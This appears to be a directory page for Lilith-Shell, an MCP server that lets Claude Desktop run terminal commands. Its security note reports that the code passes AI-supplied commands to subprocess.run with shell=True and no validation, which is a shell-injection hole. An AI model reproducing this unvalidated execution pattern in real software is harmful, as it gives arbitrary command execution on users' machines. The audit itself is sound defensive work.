Lilith-Shell
by charles-adedotun
Overview
Enables AI assistants (specifically Claude Desktop) to securely execute terminal commands on the host system through the Model Context Protocol (MCP).
Installation
python -m lilith_shellEnvironment Variables
- LILITH_TIMEOUT
- LILITH_SHELL
- LILITH_ALLOW_LIST
- LILITH_WORK_DIR
- LILITH_MAX_OUTPUT
- LILITH_MODE
Security Notes
The provided `src/lilith_shell/executor.py` module, which contains the `handle_call_tool` function, directly passes the AI-provided `command` argument to `subprocess.run` with `shell=True`. There are no visible calls to any security validation or sanitization functions (e.g., from the described `core/security.py` or `utils/sanitizer.py` in the README's architecture) *before* executing the command. This constitutes a severe shell injection vulnerability, allowing an AI assistant (or any entity capable of sending MCP requests) to execute arbitrary commands on the host system without restriction based on the provided code. While the README describes robust security features like command allowlisting, dangerous command detection, and security modes, these are not implemented or called in the core command execution logic shown in the truncated `executor.py` file, making the server extremely unsafe to run as provided.
Similar Servers
wcgw
Empowering chat applications to code, build, and run on your local machine by providing tightly integrated shell and code editing tools.
mcp-server-code-execution-mode
This server enables LLM agents to execute Python code in a highly secure, isolated container environment, facilitating complex multi-tool orchestration and data analysis with minimal LLM context token usage.
ssh-mcp-server
Bridging AI assistants to remote SSH server operations for command execution, file transfer, and server status retrieval via the Model Context Protocol (MCP).
dev-kit-mcp-server
A Model Context Protocol (MCP) server targeted for agent development tools, providing scoped authorized operations in the root project directory.